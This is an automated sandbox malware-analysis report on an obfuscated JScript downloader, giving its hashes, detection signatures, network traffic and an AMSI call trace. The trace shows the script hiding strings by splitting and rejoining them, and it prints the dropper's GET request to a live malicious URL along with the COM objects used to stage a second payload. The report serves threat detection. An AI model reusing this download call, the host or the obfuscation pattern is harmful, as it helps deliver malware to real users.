Windows Analysis Report
G9Z66ZF3Y370FN9E.js

Overview

General Information

Sample name: G9Z66ZF3Y370FN9E.js
Analysis ID: 1541954
MD5: b4b15b179e04cc1c1c41912139cf5495
SHA1: 5ecd8c64642adaf1e3a351ce1691308548ff081e
SHA256: 281d7a64e1556e677d4c355bd7521ce7d1e9265e27cd255ca9f530114dde9e37

Detection

Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
JScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Found WSH timer for Javascript or VBS script (likely evasive script)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication

AV Detection

Source: G9Z66ZF3Y370FN9E.js Avira: detected
Source: G9Z66ZF3Y370FN9E.js ReversingLabs: Detection: 68%

Networking

Source: C:\Windows\System32\wscript.exe Network Connect: 79.98.25.1 80
Source: G9Z66ZF3Y370FN9E.js Argument value : ['"GET","http://mokinukai.lt/x4szqe",false']
Source: G9Z66ZF3Y370FN9E.js Argument value : ['"User-Agent","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"']
Source: G9Z66ZF3Y370FN9E.js Return value : ['"send"']
Source: G9Z66ZF3Y370FN9E.js Return value : ['"MSXML2.XMLHTTP"', '"send"']
Source: G9Z66ZF3Y370FN9E.js Return value : ['"MSXML2.XMLHTTP"', '"send"']
Source: G9Z66ZF3Y370FN9E.js Return value : ['"MSXML2.XMLHTTP"']
Source: Joe Sandbox View IP Address: 79.98.25.1
Source: Joe Sandbox View ASN Name: RACKRAYUABRakrejusLT
Source: global traffic HTTP traffic detected: GET /x4szqe HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: mokinukai.ltConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 25 Oct 2024 09:06:15 GMTServer: ApacheCache-control: max-age=300Vary: Accept-EncodingContent-Encoding: gzipContent-Length: 1756Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 d5 58 bb 92 1b c7 15 cd 5d e5 7f 68 c1 89 24 ef 00 d8 a5 48 2d 29 00 2e bb 56 65 b3 4c b2 60 d1 54 ea 6a 60 1a c0 c5 f4 74 8f fb 81 25 18 39 71 e8 c8 c1 96 c3 8d 19 2a 57 b4 f8 11 7f 89 cf 9d 07 30 0b 80 8f 02 e5 57 34 3d d3 dd e7 3e fa 3e 4e cf e0 b3 d4 4e c3 ba 50 62 11 72 3d fa f9 cf 06 f5 53 0c 16 4a a6 3c 10 83 5c 05 89 f9 50 24 ea cf 91 56 c3 ce d4 9a a0 4c 48 78 63 47 d4 6f c3 4e 50 af 43 8f f7 7f 23 a6 0b e9 bc 0a c3 18 66 c9 65 a7 05 63 64 ae 86 1d 67 27 36 f8 d6 56 63 c9 a4 ea f5 99 30 76 66 b5 b6 d7 87 7b 56 a4 ae 0b eb 42 6b d7 35 a5 61 31 bc ec f7 cf 44 2e 5f 53 1e f3 c4 4f a5 56 c3 f3 c3 ed 61 a1 72 95 4c ad b6 ae 85 f0 8b 7e ff e1 54 3e 68 2f a7 a0 f2 c2 d9 62 d8 a1 5c ce db f6 b1 0b fc 93 5e 4f 7a 98 e6 bb b4 ea ea d0 2b 17 f9 5e 58 c4 7c 62 24 e9 6e 61 e6 6d 38 86 52 2e ac 87 1d 3b 7f f2 a9 88 9a 4c 26 9c d2 d0 0d 18 1d e1 e9 8d f2 c3 ce e3 47 af 1f 3f ea 88 85 53 b3 f7 63 f2 ae a3 70 b2 28 b4 4a 82 8d d3 45 52 41 7f 02 98 0f 6b ad fc 42 29 9c 15 87 48 1d 19 53 ef df 0b 9b aa 99 8c 3a 74 79 5d 05 19 28 68 35 ca 6d 46 26 66 92 b0 48 24 e2 d5 e6 47 a7 e6 e4 83 8b 36 48 2f 52 9b 2b 83 67 22 9e c2 ab ce a8 60 c5 8a de d0 52 0e 7a 15 00 47 73 af 09 e7 c1 c4 a6 6b 0c 10 ea 9f 25 89 98 00 ca 08 9e 54 4e 24 49 39 c1 92 e5 44 2b 21 35 cd cd 70 aa 18 57 4c 95 d6 85 4c 53 32 f3 61 bf 7c f3 85 9c 96 6f a5 b6 d8 e4 aa 01 46 69 3d 12 03 9a 39 c4 9f f0 6e fa 0e b3 2b d9 5d ce 9b 8e a8 22 fa eb 47 97 50 89 e6 8b 30 3c ef f7 85 9f 3a e4 04 4b 32 56 94 70 13 eb b0 07 82 07 bd 0a bf 11 dc 6b 24 63 e4 76 6a 41 a1 06 f0 e2 ab 51 b9 6a bb 00 03 36 76 e7 12 65 d2 3d 87 b4 3c c5 de 3b f0 d3 4e eb 9f c2 63 8b f3 7b 47 8e a3 3b df ce 15 ef 37 54 ac 2a 05 82 2d 76 c0 b5 7a 0f fb 97 0d 
cc 55 1d 32 83 c9 9e a4 c9 48 f8 bb 9b 2c 87 8e 92 44 dc 8b b4 bd f8 b2 5e 64 9a 60 2a de a5 4b a3 20 27 36 b7 14 ad 40 e2 47 b1 76 48 7e d2 c8 60 21 b3 b0 5e 55 18 13 45 a2 90 00 dc dc f2 ab 91 31 b5 4b 54 2e ea ee 9b 08 47 5c 8c 5e 58 87 7a 24 a0 a1 53 54 04 12 6d 7d 7f 05 d7 5c 1c b8 46 0c a2 6e 86 9c 95 a3 b1 23 4f cb 68 32 46 2a 1c 21 18 e5 ca 42 0b 9f ad 1d 8c 18 48 11 a4 9b a3 5a ff 09 7e db cb d0 ca 42 99 37 d1 da 19 55 5f 36 3f a0 f8 78 94 4a bb 54 83 9e 1c 7d d3 96 18 48 79 c1 e8 14 73 12 9d b1 f4 5a c6 b9 45 fa 43 28 39 aa 54 31 d1 3a 9b de fd 15 39 32 1a 6b 79 f7 37 92 b1 db ed 22 a4 ef a3 b5 f7 94 c9 ce ba af 24 c2 8a 72 ec 86 d7 b1 a2 90 d1 97 2b f2 f5 3c c4 ac 42 7d d1 b8 8d 31 b7 0e ee ed fc b3 73 da 98 41 33 45 81 72 98 d6 d4 94 c2 c9 f4 ee c6 8b 95 a2 0c ce 47 21 17 e7 1c 63 c7 0f eb a9 da dc 66 16 3a 64 91 75 0a 52 17 64 3e ee cc 5e ae d0 2b 60 10 64 57 db 50 63 bd 90 6e 22 05 ac 92 84 63 b1 3e 70 58 7a f1 b9 34 73 dd 65 fb ae d5 a4 f9 ce 16 7e 21 fe f9 97 bf 63 3f 47 d8 1c 1e 63 0f 21 e2 36 6f 5
Source: global traffic HTTP traffic detected: GET /x4szqe HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: mokinukai.ltConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: mokinukai.lt
Source: wscript.exe, 00000000.00000003.2068326113.000002A782FE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2068474138.000002A781568000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2070594412.000002A78156E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2068376106.000002A78155F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2069190978.000002A782FE5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://mokinukai.lt/x4szqe
Source: wscript.exe, 00000000.00000003.2068853819.000002A783645000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2068173045.000002A782FED000.00000004.00000020.00020000.00000000.sdmp, x4szqe[1].htm.0.dr String found in binary or memory: https://assets.iv.lt/default.css
Source: wscript.exe, 00000000.00000003.2068853819.000002A783645000.00000004.00000020.00020000.00000000.sdmp, x4szqe[1].htm.0.dr String found in binary or memory: https://assets.iv.lt/footer.html
Source: wscript.exe, 00000000.00000003.2068853819.000002A783645000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2068173045.000002A782FED000.00000004.00000020.00020000.00000000.sdmp, x4szqe[1].htm.0.dr String found in binary or memory: https://assets.iv.lt/header.html
Source: x4szqe[1].htm.0.dr String found in binary or memory: https://assets.iv.lt/images/icon.png
Source: x4szqe[1].htm.0.dr String found in binary or memory: https://assets.iv.lt/images/thumbnail.png
Source: wscript.exe, 00000000.00000003.2068853819.000002A783645000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2068173045.000002A782FED000.00000004.00000020.00020000.00000000.sdmp, x4szqe[1].htm.0.dr String found in binary or memory: https://klientams.iv.lt/
Source: wscript.exe, 00000000.00000002.2070858012.000002A78354A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2069019790.000002A78354A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: wscript.exe, 00000000.00000003.2068853819.000002A783645000.00000004.00000020.00020000.00000000.sdmp, x4szqe[1].htm.0.dr String found in binary or memory: https://www.iv.lt/
Source: wscript.exe, 00000000.00000003.2068853819.000002A783645000.00000004.00000020.00020000.00000000.sdmp, x4szqe[1].htm.0.dr String found in binary or memory: https://www.iv.lt/domenai/
Source: wscript.exe, 00000000.00000003.2068853819.000002A783645000.00000004.00000020.00020000.00000000.sdmp, x4szqe[1].htm.0.dr String found in binary or memory: https://www.iv.lt/el-pasto-filtras/
Source: wscript.exe, 00000000.00000003.2068853819.000002A783645000.00000004.00000020.00020000.00000000.sdmp, x4szqe[1].htm.0.dr String found in binary or memory: https://www.iv.lt/neribotas-svetainiu-talpinimas/
Source: wscript.exe, 00000000.00000003.2068853819.000002A783645000.00000004.00000020.00020000.00000000.sdmp, x4szqe[1].htm.0.dr String found in binary or memory: https://www.iv.lt/profesionalus-hostingas/
Source: wscript.exe, 00000000.00000003.2068853819.000002A783645000.00000004.00000020.00020000.00000000.sdmp, x4szqe[1].htm.0.dr String found in binary or memory: https://www.iv.lt/sertifikatai/
Source: wscript.exe, 00000000.00000003.2068853819.000002A783645000.00000004.00000020.00020000.00000000.sdmp, x4szqe[1].htm.0.dr String found in binary or memory: https://www.iv.lt/svetainiu-kurimo-irankis/
Source: wscript.exe, 00000000.00000003.2068853819.000002A783645000.00000004.00000020.00020000.00000000.sdmp, x4szqe[1].htm.0.dr String found in binary or memory: https://www.iv.lt/talpinimo-planai/
Source: wscript.exe, 00000000.00000003.2068853819.000002A783645000.00000004.00000020.00020000.00000000.sdmp, x4szqe[1].htm.0.dr String found in binary or memory: https://www.iv.lt/vps-serveriai/

System Summary

Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}
Source: C:\Windows\System32\wscript.exe COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}
Source: G9Z66ZF3Y370FN9E.js Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal88.evad.winJS@1/1@1/1
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\x4szqe[1].htm
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: G9Z66ZF3Y370FN9E.js ReversingLabs: Detection: 68%
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msdart.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wininet.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Data Obfuscation

Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: CreateTextFile("Z:\syscalls\8690.js.csv");IWshShell3._00000000();ITextStream.WriteLine(" entry:2467 o: f:ExpandEnvironmentStrings a0:%22%25TEMP%25%2F%22");IWshShell3.ExpandEnvironmentStrings("%TEMP%/");IWshShell3._00000000();ITextStream.WriteLine(" exit:2467 o: f:ExpandEnvironmentStrings r:%22C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5CTemp%2F%22");ITextStream.WriteLine(" entry:2489 o:%22M%2CS%2CX%2CM%2CL%2C2%2C.%2CX%2CM%2CL%2CH%2CT%2CT%2CP%22 f:DeadAstronautInSpaceBXv3");ITextStream.WriteLine(" exec:8 f:");ITextStream.WriteLine(" entry:13 o:M%2CS%2CX%2CM%2CL%2C2%2C.%2CX%2CM%2CL%2CH%2CT%2CT%2CP f:split a0:%22%2C%22");ITextStream.WriteLine(" exit:13 o:M%2CS%2CX%2CM%2CL%2C2%2C.%2CX%2CM%2CL%2CH%2CT%2CT%2CP f:split r:M%2CS%2CX%2CM%2CL%2C2%2C.%2CX%2CM%2CL%2CH%2CT%2CT%2CP");ITextStream.WriteLine(" entry:11 o:M%2CS%2CX%2CM%2CL%2C2%2C.%2CX%2CM%2CL%2CH%2CT%2CT%2CP f:join a0:%22%22");ITextStream.WriteLine(" exit:11 o:M%2CS%2CX%2CM%2CL%2C2%2C.%2CX%2CM%2CL%2CH%2CT%2CT%2CP f:join r:%22MSXML2.XMLHTTP%22");ITextStream.WriteLine(" exit:2489 o:%22M%2CS%2CX%2CM%2CL%2C2%2C.%2CX%2CM%2CL%2CH%2CT%2CT%2CP%22 f:DeadAstronautInSpaceBXv3 r:%22MSXML2.XMLHTTP%22");ITextStream.WriteLine(" entry:2581 o:%22G%2CE%2CT%22 f:DeadAstronautInSpaceBXv3");ITextStream.WriteLine(" exec:8 f:");ITextStream.WriteLine(" entry:13 o:G%2CE%2CT f:split a0:%22%2C%22");ITextStream.WriteLine(" exit:13 o:G%2CE%2CT f:split r:G%2CE%2CT");ITextStream.WriteLine(" entry:11 o:G%2CE%2CT f:join a0:%22%22");ITextStream.WriteLine(" exit:11 o:G%2CE%2CT f:join r:%22GET%22");ITextStream.WriteLine(" exit:2581 o:%22G%2CE%2CT%22 f:DeadAstronautInSpaceBXv3 r:%22GET%22");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:2575 o: f:open a0:%22GET%22 a1:%22http%3A%2F%2Fmokinukai.lt%2Fx4szqe%22 a2:false");IServerXMLHTTPRequest2.open("GET", "http://mokinukai.lt/x4szqe", "false");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:2575 o: f:open r:undefined");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:2592 o: f:setRequestHeader a0:%22User-Agent%22 a1:%22Mozilla%2F4.0%20(compatible%3B%20MSIE%206.0%3B%20Windows%20NT%205.0)%22");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:2592 o: f:setRequestHeader r:undefined");ITextStream.WriteLine(" entry:2604 o:%22s%2Ce%2Cn%2Cd%22 f:DeadAstronautInSpaceBXv3");ITextStream.WriteLine(" exec:8 f:");ITextStream.WriteLine(" entry:13 o:s%2Ce%2Cn%2Cd f:split a0:%22%2C%22");ITextStream.WriteLine(" exit:13 o:s%2Ce%2Cn%2Cd f:split r:s%2Ce%2Cn%2Cd");ITextStream.WriteLine(" entry:11 o:s%2Ce%2Cn%2Cd f:join a0:%22%22");ITextStream.WriteLine(" exit:11 o:s%2Ce%2Cn%2Cd f:join r:%22send%22");ITextStream.WriteLine(" exit:2604 o:%22s%2Ce%2Cn%2Cd%22 f:DeadAstronautInSpaceBXv3 r:%22send%22");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:2600 o: f:send");IServerXMLHTTPRequest2.send()
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: wscript.exe, 00000000.00000002.2070819715.000002A783520000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0RX
Source: wscript.exe, 00000000.00000003.2069364794.000002A78355B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2070610524.000002A78157D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2068495136.000002A781577000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2070922645.000002A78355E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2068474138.000002A781568000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2069019790.000002A78355A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2068376106.000002A78155F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe Network Connect: 79.98.25.1 80
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid